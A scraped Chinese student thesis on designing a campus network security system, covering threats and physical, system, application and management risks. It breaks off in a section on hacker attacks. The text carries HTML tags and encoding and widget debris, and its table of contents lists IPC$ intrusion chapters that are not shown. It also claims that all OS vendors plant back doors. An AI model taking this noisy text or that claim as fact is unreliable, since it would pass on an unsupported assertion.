網(wǎng)絡(luò)安全系統(tǒng)設(shè)計(jì)畢業(yè)設(shè)計(jì)論文

1、<p><b>　　畢業(yè)設(shè)計(jì)（論文）</b></p><p>　　題目 網(wǎng)絡(luò)安全系統(tǒng)設(shè)計(jì) </p><p>　　系 別 軟件工程系 </p><p>　　專(zhuān) 業(yè) 計(jì)算機(jī)網(wǎng)絡(luò)技術(shù)</p><p>　　畢業(yè)設(shè)計(jì)（論文）任務(wù)書(shū)</p><p>

2、　　軟件 系 11 屆 網(wǎng)絡(luò) 專(zhuān)業(yè)</p><p>　　畢業(yè)設(shè)計(jì)（論文）任務(wù)書(shū)</p><p>　　注：本任務(wù)書(shū)要求一式兩份，一份系部留存，一份報(bào)教務(wù)處實(shí)踐教學(xué)科。</p><p><b>　　中 文 摘 要</b></p><p>　　本文主要分析了校園網(wǎng)當(dāng)前所處的背景、特征、準(zhǔn)確、及時(shí)地了解網(wǎng)絡(luò)的運(yùn)

3、行的狀況，并對(duì)校園網(wǎng)絡(luò)安全作出評(píng)價(jià)，是保障校園網(wǎng)絡(luò)安全的前提。本文通過(guò)分析校園網(wǎng)普遍存在的安全問(wèn)題，然后結(jié)合校園網(wǎng)絡(luò)安全的需求，設(shè)計(jì)出安全的校園網(wǎng)絡(luò)安全系統(tǒng)。主要運(yùn)用各種防火墻技術(shù)對(duì)校園網(wǎng)絡(luò)進(jìn)行分析和比較，闡述了防火墻系統(tǒng)的安全產(chǎn)品及使用原則。</p><p>　　關(guān)鍵詞：計(jì)算機(jī)網(wǎng)絡(luò)、校園網(wǎng)、網(wǎng)絡(luò)安全、網(wǎng)絡(luò)設(shè)計(jì)、防火墻</p><p><b>　　ANSTRACT</b&g

4、t;</p><p>　　This paper analyzes the current context in which the campus network, features, accurate and timely information on the status of the operation of the network, and to assess the campus network secu

5、rity, network security is to protect the campus premises. This paper analyzes the prevalence of campus network security issues, and then combined with the campus network security needs, design a safe campus network secur

6、ity system. Mainly through a variety of firewall technology on the campus network ana</p><p><b>　　朗讀</b></p><p>　　顯示對(duì)應(yīng)的拉丁字符的拼音</p><p>　　字典 - 查看字典詳細(xì)內(nèi)容</p><p>

7、;　　Keywords: computer network, network, network security, network design, firewall朗讀</p><p>　　顯示對(duì)應(yīng)的拉丁字符的拼音</p><p>　　字典 - 查看字典詳細(xì)內(nèi)容</p><p><b>　　朗讀</b></p><p>

8、　　顯示對(duì)應(yīng)的拉丁字符的拼音</p><p>　　字典 - 查看字典詳細(xì)內(nèi)容</p><p><b>　　目 錄</b></p><p>　　一、概述 - - - - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - 8</p><p>　　（一）

9、計(jì)算機(jī)網(wǎng)絡(luò)安全的含義- - - - - - - - - - - - - - - - - - - - - - - - - 8</p><p>　?。ǘ┚W(wǎng)絡(luò)安全項(xiàng)目背景 - - - - - - - - - - - - - - - - - - - - - - - - - - 8</p><p>　　（三）網(wǎng)絡(luò)安全項(xiàng)目的建設(shè)意義 - - - - - - - - - - - - - - - - -

10、 - - - - - - 8</p><p>　　二、需求分析- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 9</p><p>　?。ㄒ唬┚W(wǎng)絡(luò)的現(xiàn)狀 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -9</p><p>　

11、?。ǘ┚W(wǎng)絡(luò)的網(wǎng)絡(luò)安全現(xiàn)狀 - - - - - - - - - - - - - - - - - - - - - - - - - - 9</p><p>　?。ㄈ┚W(wǎng)絡(luò)的主要網(wǎng)絡(luò)安全威脅- - - - - - - - - - - - - - - - - - - - - - - - 9</p><p>　?。ㄋ模┚W(wǎng)絡(luò)的網(wǎng)絡(luò)安全需求分析- - - - - - - - - - - - - - -

12、- - - - - - - - - 9</p><p>　　1、物理安全風(fēng)險(xiǎn)分析 - - - - - - - - - - - - - - - - - - - - - - - - - - 10</p><p>　　2、網(wǎng)絡(luò)平臺(tái)的安全風(fēng)險(xiǎn)分析 - - - - - - - - - - - - - - - - - - - - - - - - 10</p><p>　　3、系

13、統(tǒng)的安全風(fēng)險(xiǎn)分析 - - - - - - - - - - - - - - - - - - - - - - - - -10</p><p>　　4、應(yīng)用的安全風(fēng)險(xiǎn)分析 - - - - - - - - - - - - - - - - - - - - - - - - -10</p><p>　　5、管理的安全風(fēng)險(xiǎn)分析 - - - - - - - - - - - - - - - - - - - -

14、 - - - - -11</p><p>　　6、黑客攻擊 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 11</p><p>　　7、通用網(wǎng)關(guān)接口（CGI）漏洞 - - - - - - - - - - - - - - - - - - - - - - -11</p><p>　　8、惡意代碼

15、- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 11</p><p>　　9、病毒的攻擊 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 12</p><p>　　10、網(wǎng)絡(luò)的攻擊手段- - - - - - - - - - - - - - - - -

16、- - - - - - - - - - 12</p><p>　?。ㄎ澹┚W(wǎng)絡(luò)安全的系統(tǒng)目標(biāo)- - - - - - - - - - - - - - - - - - - - - - - - - - -12</p><p>　　三、總體規(guī)劃- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 12</p>&

17、lt;p>　　（一）安全體系結(jié)構(gòu)- - - - - - - - - - - - - - - - - - - - - - - - - - - - - 12</p><p>　　1、 網(wǎng)絡(luò)結(jié)構(gòu)安全- - - - - - - - - - - - - - - - - - - - - - - - - - - - 12</p><p>　　2、 加強(qiáng)訪問(wèn)控制- - - - - - - - - -

18、 - - - - - - - - - - - - - - - - - - 12 3、 安全檢測(cè) - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -12</p><p>　?。ǘ┌踩w系設(shè)計(jì)- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -12</p>

19、<p>　　1、網(wǎng)絡(luò)結(jié)構(gòu)安全- - - - - - - - - - - - - - - - - - - - - - - - - - - - 12</p><p>　　2、加強(qiáng)訪問(wèn)控制- - - - - - - - - - - - - - - - - - - - - - - - - - - - 13</p><p>　　3、安全檢測(cè) - - - - - - - - - - -

20、- - - - - - - - - - - - - - - - - - -13</p><p>　?。ㄈ┚W(wǎng)絡(luò)安全體系原則- - - - - - - - - - - - - - - - - - - - - - - - - - - 13</p><p>　　1、網(wǎng)絡(luò)信息安全的木桶原則- - - - - - - - - - - - - - - - - - - - - - - -13</p

21、><p>　　2、網(wǎng)絡(luò)信息安全的整體性原則- - - - - - - - - - - - - - - - - - - - - - - -13</p><p>　　3、安全性評(píng)價(jià)與平衡原則 - - - - - - - - - - - - - - - - - - - - - - - - -13</p><p>　　4、標(biāo)準(zhǔn)化與一致性原則- - - - - - - - - -

22、 - - - - - - - - - - - - - - - - 13</p><p>　　5、技術(shù)與管理相結(jié)合原則- - - - - - - - - - - - - - - - - - - - - - - - - 14</p><p>　　6、統(tǒng)籌規(guī)劃，分步實(shí)施原則- - - - - - - - - - - - - - - - - - - - - - - - -14</p>

23、<p>　　7、等級(jí)性原則- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -14</p><p>　　8、動(dòng)態(tài)發(fā)展原則- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -14</p><p>　　9、易操作性原則- - - - - - - - -

24、 - - - - - - - - - - - - - - - - - - - - -14</p><p>　　（四）安全產(chǎn)品選型原則- - - - - - - - - - - - - - - - - - - - - - - - - - - -14</p><p>　　四、安全方案設(shè)計(jì)- - - - - - - - - - - - - - - - - - - - - - - - - - -

25、- - 15</p><p>　　（一）利用入侵檢測(cè)技術(shù)實(shí)施安全防護(hù) - - - - - - - - - - - - - - - - - - - - 15</p><p>　　1、建立ipc$連接在hack攻擊中的作用 - - - - - - - - - - - - - - - - - - -16</p><p>　　2、ipc$與空連接,139,445端口,默認(rèn)共

26、享的關(guān)系 - - - - - - - - - - - - - - -16</p><p>　　3、如何打開(kāi)目標(biāo)的IPC$ - - - - - - - - - - - - - - - - - - - - - - - - 16</p><p>　　4、入侵模式- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -16<

27、;/p><p>　　5、 如何防范ipc$入侵- - - - - - - - - - - - - - - - - - - - - - - - - - -22</p><p>　?。ǘ┯梅阑饓夹g(shù)防止外網(wǎng)入侵 - - - - - - - - - - - - - - - - - - - - - - 22</p><p>　　1、基于路由器的防火墻- - - - - -

28、- - - - - - - - - - - - - - - - - - -23</p><p>　　2、用戶(hù)化的防火墻工具套- - - - - - - - - - - - - - - - - - - - - - -24</p><p>　　3、建立在通用操作系統(tǒng)上的防火墻- - - - - - - - - - - - - - - - - - - - -24</p><

29、;p>　　4、防火墻產(chǎn)品將網(wǎng)關(guān)與安全系統(tǒng)合二為一，其主要功能- - - -- - - - - - - 24</p><p>　?。ㄈ┦褂媒粨Q機(jī)端口隔離技術(shù)實(shí)現(xiàn)內(nèi)網(wǎng)間的隔離 - - - - - - - - - - - - - - - 25</p><p>　　1、基于VLAN的劃分與管理- - - - - - - - - - - - - - - - - - - - - - -25&

30、lt;/p><p>　　2、在交換機(jī)2960上實(shí)現(xiàn)內(nèi)網(wǎng)之間的通信- - - - - - - - - - - - - - - - - - 28</p><p>　　3、在Trunk方式下跨交換機(jī)的配置實(shí)現(xiàn)不同子網(wǎng)之間的隔離與通信- - - - - - - 30</p><p>　?。ㄋ模├寐酚善骷夹g(shù)實(shí)現(xiàn)外網(wǎng)與內(nèi)網(wǎng)之間的隔離與通信 - - - - - - - - - -

31、- - 35</p><p>　　1、路由器基本配置與分析 - - - - - - - - - - - - - - - - - - - - - - - - 36</p><p>　　2、配置IP地址 - - - - - - - - - - - - - - - - - - - - - - - - - - - - 36</p><p>　　3、配置ip路由協(xié)議(RIP,

32、OSPF,BGP,STATICS)- - - - - - - - - - - - - - - - 36</p><p>　　五、系統(tǒng)總體評(píng)估 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 38</p><p>　　謝辭 - - - - - - - - - - - - - - - - - - - - - - - - -

33、 - - - - - - - - - - - - 39</p><p>　　參考文獻(xiàn) - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 40</p><p>　　網(wǎng) 絡(luò) 安 全 系 統(tǒng) 設(shè) 計(jì)</p><p><b>　　概述</b></p>

34、;<p>　　計(jì)算機(jī)網(wǎng)絡(luò)安全的含義 </p><p>　　網(wǎng)絡(luò)安全從其本質(zhì)上來(lái)講，就是網(wǎng)絡(luò)上的信息安全。從廣義上說(shuō)，凡是涉及到網(wǎng)絡(luò)信息的保密性、完整性、可用性、真實(shí)性和可控性的相關(guān)技術(shù)和理論，都是網(wǎng)絡(luò)安全所要研究的領(lǐng)域。一般認(rèn)為，網(wǎng)絡(luò)安全是指網(wǎng)絡(luò)系統(tǒng)的硬件、軟件及其系統(tǒng)中的數(shù)據(jù)受到保護(hù)，不受偶然的或者惡意的原因而遭到破壞、更改、泄露，系統(tǒng)連續(xù)可靠正常運(yùn)行，網(wǎng)絡(luò)服務(wù)不被中斷。 </p&

35、gt;<p>　　隨著網(wǎng)絡(luò)安全技術(shù)不斷發(fā)展，計(jì)算機(jī)網(wǎng)絡(luò)安全的具體含義會(huì)隨著使用者的變化而變化，使用者不同，對(duì)網(wǎng)絡(luò)安全的認(rèn)識(shí)和要求也就不同。例如從普通使用者的角度來(lái)說(shuō)，可能僅僅希望個(gè)人隱私或機(jī)密信息在網(wǎng)絡(luò)上傳輸時(shí)受到保護(hù)，避免被竊聽(tīng)、篡改和偽造； 而網(wǎng)絡(luò)提供商除了關(guān)心這些網(wǎng)絡(luò)信息安全外，還要考慮如何應(yīng)付突發(fā)的自然災(zāi)害、 軍事打擊等對(duì)網(wǎng)絡(luò)硬件的破壞，以及在網(wǎng)絡(luò)出現(xiàn)異常時(shí)如何恢復(fù)網(wǎng)絡(luò)通信， 保持網(wǎng)絡(luò)通信的連續(xù)性。  

36、      從本質(zhì)上來(lái)講，網(wǎng)絡(luò)安全包括組成網(wǎng)絡(luò)系統(tǒng)的硬件、軟件及其在網(wǎng)絡(luò)上傳輸信息的安全性，使其不致 因偶然的或者惡意的攻擊遭到破壞，網(wǎng)絡(luò)安全既有技術(shù)方面的問(wèn)題，也有管理方面的問(wèn)題，兩方面相互補(bǔ)充，缺一不可。</p><p><b>　　網(wǎng)絡(luò)安全項(xiàng)目的背景</b></p><p>　　隨著信息化程度的提高，越

37、來(lái)越多的學(xué)校建立了校園網(wǎng)和網(wǎng)站，把校園的介紹、規(guī)劃、招生、研究成果等發(fā)布在網(wǎng)站，讓跟多的人了解自己的校園，甚至在網(wǎng)上即時(shí)進(jìn)行學(xué)術(shù)交流等。在網(wǎng)絡(luò)信息技術(shù)高度發(fā)展的今天，作為學(xué)校，為了方便學(xué)術(shù)交流、校友聯(lián)絡(luò)、招生報(bào)名、研究成果等的發(fā)布等，建設(shè)自己的網(wǎng)站和郵件系統(tǒng)是必須的。在當(dāng)前的信息互動(dòng)交流中，電子郵件的應(yīng)用憑借其快速、靈活的特點(diǎn)，在整個(gè)互聯(lián)網(wǎng)應(yīng)用中有著舉足輕重的地位。</p><p>　　信息化程度的提高，極大地促

38、進(jìn)了教育事業(yè)的發(fā)展，但是隨之而來(lái)的卻是信息安全問(wèn)題。校園網(wǎng)絡(luò)以廣域網(wǎng)絡(luò)作為支撐平臺(tái)，如何保障網(wǎng)絡(luò)安全成為不可避免的重大問(wèn)題。</p><p>　　網(wǎng)絡(luò)安全性是一個(gè)涉及面很廣泛的問(wèn)題，其中也 會(huì)涉及到是否構(gòu)成犯罪行為的問(wèn)題。在其最簡(jiǎn)單的形式中，它主要關(guān)心的是確保無(wú)關(guān)人員不能讀取，更不能修改傳送給其他接收者的信息。此時(shí)，它關(guān)心的對(duì)象是那 些無(wú)權(quán)使用，但卻試圖獲得遠(yuǎn)程服務(wù)的人。安全性也處理合法消息被截獲和重播的問(wèn)題，以

39、及發(fā)送者是否曾發(fā)送過(guò)該條消息的問(wèn)題。 大多數(shù)安全性問(wèn)題的出現(xiàn)都是由于有惡意的人試圖獲得某種好處或損害某些人而故意引起的?？梢钥闯霰ＷC網(wǎng)絡(luò)安全不僅僅是使它沒(méi)有編程錯(cuò)誤。它包括要防范那些聰明的，通常也是狡猾的、專(zhuān)業(yè)的，并且在時(shí)間和金錢(qián)上是很充足、富有的人。同時(shí)，必須清楚地認(rèn)識(shí)到，能夠制止偶然實(shí)施破壞行為的敵人的方法對(duì)那些慣于作案的老手來(lái)說(shuō)，收效甚微。 網(wǎng)絡(luò)安全性可以被粗略地分為4個(gè)相互交織的部分：保密、鑒別、反拒認(rèn)以及完整性控制

40、。保密是保護(hù)信息不被未授權(quán)者訪問(wèn)，這是人們提到的網(wǎng)絡(luò)安 全性時(shí)最常想到的內(nèi)容。鑒別主要指在揭示敏感信息或進(jìn)行事務(wù)處理之前先確認(rèn)對(duì)方的身份。反拒認(rèn)主要與簽名有關(guān)。保密和完整性通過(guò)使用注冊(cè)過(guò)的郵件和文件鎖 來(lái)實(shí)現(xiàn)。</p><p>　?。?）網(wǎng)絡(luò)安全項(xiàng)目的建設(shè)意義</p><p>　　網(wǎng)絡(luò)安全是網(wǎng)絡(luò)正常運(yùn)行的前提。網(wǎng)絡(luò)安全不單是單點(diǎn)的安全，而是整個(gè)信息網(wǎng)的安全，需要從物理、網(wǎng)絡(luò)、系 統(tǒng)、應(yīng)用和

41、管理方面進(jìn)行立體的防護(hù)。要知道如何防護(hù)，首先需要了解安全風(fēng)險(xiǎn)來(lái)自于何處。網(wǎng)絡(luò)安全系統(tǒng)必須包括技術(shù)和管理兩方面，涵蓋物理層、系統(tǒng)層、網(wǎng)絡(luò)層、應(yīng)用層和管理層各個(gè)層面上的諸多風(fēng)險(xiǎn)類(lèi)。無(wú)論哪個(gè)層面上的安全措施不到位，都會(huì)存在很大的安全隱患，都有可能造成網(wǎng)絡(luò)的中斷。根據(jù)國(guó)內(nèi)網(wǎng)絡(luò)系統(tǒng)的網(wǎng)絡(luò)結(jié)構(gòu)和應(yīng)用情況，應(yīng)當(dāng)從網(wǎng)絡(luò)安全、系統(tǒng)安全、應(yīng)用安全及管理安全等方面進(jìn)行全面地分析。</p><p>　　無(wú)論是在局域網(wǎng)還是在廣域網(wǎng)中，網(wǎng)絡(luò)

42、的安全措施應(yīng)是能全方位地杜絕各種不同的威脅和脆弱性，這樣才能確保網(wǎng)絡(luò)信息的保密性、完整性和可用性。根據(jù)網(wǎng)絡(luò)安全檢測(cè)軟件的實(shí)際測(cè)試情況顯示，一個(gè)沒(méi)有安全防護(hù)措施的大型網(wǎng)絡(luò)，其安全漏洞可達(dá)1500個(gè)左右。目前的網(wǎng)絡(luò)中雖然采用一些安全產(chǎn)品，有一套安全制度，但由于各種客觀的原因仍然存在種種安全上的問(wèn)題。同時(shí)，由于網(wǎng)絡(luò)的安全狀況隨著時(shí)間變化而變化，因此自作安全考慮時(shí)，除了合理的使用和配置各種安全軟件、硬件產(chǎn)品外，日常的檢測(cè)和后續(xù)的服務(wù)也越來(lái)越受到

43、重視。</p><p><b>　　需求分析</b></p><p><b>　　網(wǎng)絡(luò)的現(xiàn)狀</b></p><p>　　校園網(wǎng)絡(luò)中學(xué)校為了滿(mǎn)足網(wǎng)絡(luò)用戶(hù)的需求，主要采用的是寬松的共享寬帶的上網(wǎng)管理方式。當(dāng)前很多流行的互聯(lián)網(wǎng)應(yīng)用都是采用P2P技術(shù)搶占高寬帶，造成網(wǎng)路寬帶的利用率分配不均衡，一些用戶(hù)長(zhǎng)時(shí)間使用該類(lèi)軟件，占據(jù)大量

44、的帶寬資源，自然會(huì)造成另一部分用戶(hù)網(wǎng)速慢、不能正常瀏覽網(wǎng)頁(yè)等現(xiàn)象。另外，還有就是網(wǎng)絡(luò)病毒的入侵、網(wǎng)絡(luò)攻擊使計(jì)算機(jī)的部分資源受到很大的攻擊，服務(wù)器受到攻擊，使信息部分流失。</p><p>　　為此，今后將逐步加強(qiáng)網(wǎng)絡(luò)高峰期出口策略的優(yōu)化，針對(duì)強(qiáng)占出口帶寬的網(wǎng)絡(luò)應(yīng)用給予一定的限制，保證充分調(diào)研的基礎(chǔ)上，增加一些有效地輔助設(shè)備來(lái)進(jìn)行網(wǎng)絡(luò)流量的管理，加強(qiáng)對(duì)帶寬侵蝕狀況的防御能力。增強(qiáng)防火墻的防御能力，定期對(duì)計(jì)算機(jī)進(jìn)行系

45、統(tǒng)補(bǔ)丁的安裝以及對(duì)殺毒軟件的更新。</p><p><b>　　網(wǎng)絡(luò)的網(wǎng)絡(luò)安全現(xiàn)狀</b></p><p>　　校園網(wǎng)絡(luò)通常是通過(guò)CERNET與Internet相連或直接與Internet相連，許多用戶(hù)每天都</p><p>　　要通過(guò)校園網(wǎng)訪問(wèn)Internet資源，與此同時(shí)也為外網(wǎng)病毒進(jìn)入校園網(wǎng)打開(kāi)了方便之門(mén)，</p><

46、p>　　Internet上的許多的資源都暗藏病毒，用戶(hù)下載的程序和電子郵件都可能帶有木馬和病毒。因此，大量的網(wǎng)絡(luò)病毒及各類(lèi)攻擊隨之而來(lái)，不斷跟新的病毒與黑客攻擊手段對(duì)網(wǎng)絡(luò)安全造成了很大的威脅</p><p>　　校園網(wǎng)只考慮了對(duì)外服務(wù)器的安全性，對(duì)內(nèi)服務(wù)器的安全性則是暴露在內(nèi)部交換機(jī)上</p><p>　　的，隨時(shí)可能受到來(lái)自?xún)?nèi)部網(wǎng)絡(luò)用戶(hù)的掃描、窺探和攻擊，這是很?chē)?yán)重的問(wèn)題，所以盡快

47、的對(duì)網(wǎng)絡(luò)作進(jìn)一步的安全保護(hù)措施是重要的。</p><p>　　另外，隨著上網(wǎng)人數(shù)的越來(lái)越多，病毒的傳播也是非常的廣泛，所以應(yīng)定期對(duì)學(xué)校學(xué)生計(jì)算機(jī)進(jìn)行系統(tǒng)漏洞的檢測(cè)、補(bǔ)丁的安裝以及對(duì)殺毒軟件定期進(jìn)行升級(jí)。</p><p>　　網(wǎng)絡(luò)的主要網(wǎng)絡(luò)安全威脅</p><p>　　1、來(lái)自外網(wǎng)的病毒和黑客攻擊</p><p>　　2、來(lái)自校園網(wǎng)絡(luò)內(nèi)部的攻擊

48、和病毒</p><p>　　3、操作系統(tǒng)的安全漏洞</p><p>　　4、管理方面存在的問(wèn)題</p><p>　　網(wǎng)絡(luò)的網(wǎng)絡(luò)安全需求分析</p><p>　　隨著Internet網(wǎng)絡(luò)急劇擴(kuò)大和上網(wǎng)用戶(hù)迅速增加，風(fēng)險(xiǎn)變得更加嚴(yán)重和復(fù)雜。原來(lái)由單個(gè)計(jì)算機(jī)安全事故引起的損害可能傳播到其它系統(tǒng)，引起大范圍的癱瘓和損失；另外加上缺乏安全控制機(jī)制和對(duì)I

49、nternet安全政策的認(rèn)識(shí)不足，這些風(fēng)險(xiǎn)正日益嚴(yán)重。 </p><p>　　針對(duì)政務(wù)信息網(wǎng)中存在的安全隱患，在進(jìn)行安全方案設(shè)計(jì)時(shí)，下述安全風(fēng)險(xiǎn)我們必須要認(rèn)真考慮，并且要針對(duì)面臨的風(fēng)險(xiǎn)，采取相應(yīng)的安全措施。下述風(fēng)險(xiǎn)由多種因素引起，與政務(wù)網(wǎng)結(jié)構(gòu)和系統(tǒng)的應(yīng)用、局域網(wǎng)內(nèi)網(wǎng)絡(luò)服務(wù)器的可靠性等因素密切相關(guān)。下面列出部分這類(lèi)風(fēng)險(xiǎn)因素： </p><p>　　網(wǎng)絡(luò)安全可以從以下五個(gè)方面來(lái)理解：</

50、p><p>　　1. 網(wǎng)絡(luò)物理是否安全；</p><p>　　2. 網(wǎng)絡(luò)平臺(tái)是否安全；</p><p>　　3. 系統(tǒng)是否安全；</p><p>　　4. 應(yīng)用是否安全；</p><p>　　5. 管理是否安全。</p><p>　　1 、物理安全風(fēng)險(xiǎn)分析 </p><p>

51、　　網(wǎng)絡(luò)的物理安全的風(fēng)險(xiǎn)是多種多樣的。</p><p>　　網(wǎng)絡(luò)的物理安全主要是指地震、水災(zāi)、火災(zāi)等環(huán)境事故；電源故障；人為操作失誤或錯(cuò)誤；設(shè)備被盜、被毀；電磁干擾；線(xiàn)路截獲。以及高可用性的硬件、雙機(jī)多冗余的設(shè)計(jì)、機(jī)房環(huán)境及報(bào)警系統(tǒng)、安全意識(shí)等。它是整個(gè)網(wǎng)絡(luò)系統(tǒng)安全的前提，在政務(wù)網(wǎng)內(nèi)，由于網(wǎng)絡(luò)的物理跨度不大，，只要制定健全的安全管理制度，做好備份，并且加強(qiáng)網(wǎng)絡(luò)設(shè)備和機(jī)房的管理，這些風(fēng)險(xiǎn)是可以避免的。</p&

52、gt;<p>　　2、網(wǎng)絡(luò)平臺(tái)的安全風(fēng)險(xiǎn)分析 </p><p>　　網(wǎng)絡(luò)結(jié)構(gòu)的安全涉及到網(wǎng)絡(luò)拓?fù)浣Y(jié)構(gòu)、網(wǎng)絡(luò)路由狀況及網(wǎng)絡(luò)的環(huán)境等。</p><p>　　(1) 公開(kāi)服務(wù)器面臨的威脅 :</p><p>　　校園網(wǎng)內(nèi)公開(kāi)服務(wù)器區(qū)（WWW、EMAIL等服務(wù)器）作為校園的信息發(fā)布平臺(tái)，一旦不能運(yùn)行后者受到攻擊，對(duì)學(xué)校的聲譽(yù)影響巨大。同時(shí)公開(kāi)服務(wù)器本身要為外界

53、服務(wù)，必須開(kāi)放相應(yīng)的服務(wù)；每天，黑客都在試圖闖入Internet節(jié)點(diǎn)，這些節(jié)點(diǎn)如果不保持警惕，可能連黑客怎么闖入的都不知道，甚至?xí)蔀楹诳腿肭制渌军c(diǎn)的跳板。因此，規(guī)模比較大網(wǎng)絡(luò)的管理人員對(duì)Internet安全事故做出有效反應(yīng)變得十分重要。有必要將公開(kāi)服務(wù)器、內(nèi)部網(wǎng)絡(luò)與外部網(wǎng)絡(luò)進(jìn)行隔離，避免網(wǎng)絡(luò)結(jié)構(gòu)信息外泄；同時(shí)還要對(duì)外網(wǎng)的服務(wù)請(qǐng)求加以過(guò)濾，只允許正常通信的數(shù)據(jù)包到達(dá)相應(yīng)主機(jī)，其它的請(qǐng)求服務(wù)在到達(dá)主機(jī)之前就應(yīng)該遭到拒絕。</p&g

54、t;<p>　　(2) 整個(gè)網(wǎng)絡(luò)結(jié)構(gòu)和路由狀況 :</p><p>　　安全的應(yīng)用往往是建立在網(wǎng)絡(luò)系統(tǒng)之上的。網(wǎng)絡(luò)系統(tǒng)的成熟與否直接影響安全系統(tǒng)成功的建設(shè)。在政務(wù)網(wǎng)絡(luò)系統(tǒng)中，只使用了一臺(tái)路由器，用作與Internet連結(jié)的邊界路由器，網(wǎng)絡(luò)結(jié)構(gòu)相對(duì)簡(jiǎn)單，具體配置時(shí)可以考慮使用靜態(tài)路由，這就大大減少了因網(wǎng)絡(luò)結(jié)構(gòu)和網(wǎng)絡(luò)路由造成的安全風(fēng)險(xiǎn)。 </p><p>　　3、系統(tǒng)的安全風(fēng)險(xiǎn)分

55、析 </p><p>　　所謂系統(tǒng)的安全顯而易見(jiàn)是指整個(gè)局域網(wǎng)網(wǎng)絡(luò)操作系統(tǒng)、網(wǎng)絡(luò)硬件平臺(tái)是否可靠且值得信任。 </p><p>　　網(wǎng)絡(luò)操作系統(tǒng)、網(wǎng)絡(luò)硬件平臺(tái)的可靠性：對(duì)于中國(guó)來(lái)說(shuō)，恐怕沒(méi)有絕對(duì)安全的操作系統(tǒng)可以選擇，無(wú)論是Microsoft的Windows NT或者其它任何商用UNIX操作系統(tǒng)，其開(kāi)發(fā)廠商必然有其Back-Door。但是，可以對(duì)現(xiàn)有的操作平臺(tái)進(jìn)行安全配置、對(duì)操作和訪問(wèn)權(quán)限

56、進(jìn)行嚴(yán)格控制，提高系統(tǒng)的安全性。因此，不但要選用盡可能可靠的操作系統(tǒng)和硬件平臺(tái)。而且，必須加強(qiáng)登錄過(guò)程的認(rèn)證（特別是在到達(dá)服務(wù)器主機(jī)之前的認(rèn)證），確保用戶(hù)的合法性；其次應(yīng)該嚴(yán)格限制登錄者的操作權(quán)限，將其完成的操作限制在最小的范圍內(nèi)。</p><p>　　4、應(yīng)用的安全風(fēng)險(xiǎn)分析</p><p>　　應(yīng)用系統(tǒng)的安全跟具體的應(yīng)用有關(guān)，它涉及很多方面。應(yīng)用系統(tǒng)的安全是動(dòng)態(tài)的、不斷變化的。應(yīng)用的安全

57、性也涉及到信息的安全性，它包括很多方面。</p><p>　　應(yīng)用系統(tǒng)的安全動(dòng)態(tài)的、不斷變化的：應(yīng)用的安全涉及面很廣，以目前Internet上應(yīng)用最為廣泛的E-mail系統(tǒng)來(lái)說(shuō)，其解決方案有幾十種，但其系統(tǒng)內(nèi)部的編碼甚至編譯器導(dǎo)致的BUG是很少有人能夠發(fā)現(xiàn)的，因此一套詳盡的測(cè)試軟件是相當(dāng)必須的。但是應(yīng)用系統(tǒng)是不斷發(fā)展且應(yīng)用類(lèi)型是不斷增加的，其結(jié)果是安全漏洞也是不斷增加且隱藏越來(lái)越深。因此，保證應(yīng)用系統(tǒng)的安全也是一

58、個(gè)隨網(wǎng)絡(luò)發(fā)展不斷完善的過(guò)程。 </p><p>　　應(yīng)用的安全性涉及到信息、數(shù)據(jù)的安全性：信息的安全性涉及到：機(jī)密信息泄露、未經(jīng)授權(quán)的訪問(wèn)、破壞信息完整性、假冒、破壞系統(tǒng)的可用性等。由于政務(wù)網(wǎng)跨度不大，絕大部分重要信息都在內(nèi)部傳遞，因此信息的機(jī)密性和完整性是可以保證的。對(duì)于有些特別重要的信息需要對(duì)內(nèi)部進(jìn)行保密的（比如辦公子網(wǎng)、檔案子網(wǎng)傳遞的重要信息）可以考慮在應(yīng)用級(jí)進(jìn)行加密，針對(duì)具體的應(yīng)用直接在應(yīng)用系統(tǒng)開(kāi)發(fā)時(shí)進(jìn)行

59、加密。</p><p>　　5、管理的安全風(fēng)險(xiǎn)分析 </p><p>　　管理是網(wǎng)絡(luò)安全中最重要的部分 </p><p>　　管理是網(wǎng)絡(luò)中安全最最重要的部分。責(zé)權(quán)不明，管理混亂、安全管理制度不健全及缺乏可操作性等都可能引起管理安全的風(fēng)險(xiǎn)。責(zé)權(quán)不明，管理混亂，使得一些員工或管理員隨便讓一些非本地員工甚至外來(lái)人員進(jìn)入機(jī)房重地，或者員工有意無(wú)意泄漏一些重要信息，而管理上卻

60、沒(méi)有相應(yīng)制度來(lái)約束。</p><p>　　當(dāng)網(wǎng)絡(luò)出現(xiàn)攻擊行為或網(wǎng)絡(luò)受到其它一些安全威脅時(shí)（如內(nèi)部人員的違規(guī)操作等），無(wú)法進(jìn)行實(shí)時(shí)的檢測(cè)、監(jiān)控、報(bào)告與預(yù)警。同時(shí)，當(dāng)事故發(fā)生后，也無(wú)法提供黑客攻擊行為的追蹤線(xiàn)索及破案依據(jù)，即缺乏對(duì)網(wǎng)絡(luò)的可控性與可審查性。這就要求必須對(duì)站點(diǎn)的訪問(wèn)活動(dòng)進(jìn)行多層次的記錄，及時(shí)發(fā)現(xiàn)非法入侵行為。</p><p>　　建立全新網(wǎng)絡(luò)安全機(jī)制，必須深刻理解網(wǎng)絡(luò)并能提供直接的

61、解決方案，因此，最可行的做法是管理制度和管理解決方案的結(jié)合。</p><p><b>　　6、黑客攻擊 </b></p><p>　　黑客們的攻擊行動(dòng)是無(wú)時(shí)無(wú)刻不在進(jìn)行的，而且會(huì)利用系統(tǒng)和管理上的一切可能利用的漏洞。公開(kāi)服務(wù)器存在漏洞的一個(gè)典型例證，是黑客可以輕易地騙過(guò)公開(kāi)服務(wù)器軟件，得到Unix的口令檔并將之送回。黑客侵入U(xiǎn)NIX服務(wù)器后，有可能修改特權(quán)，從普通用戶(hù)

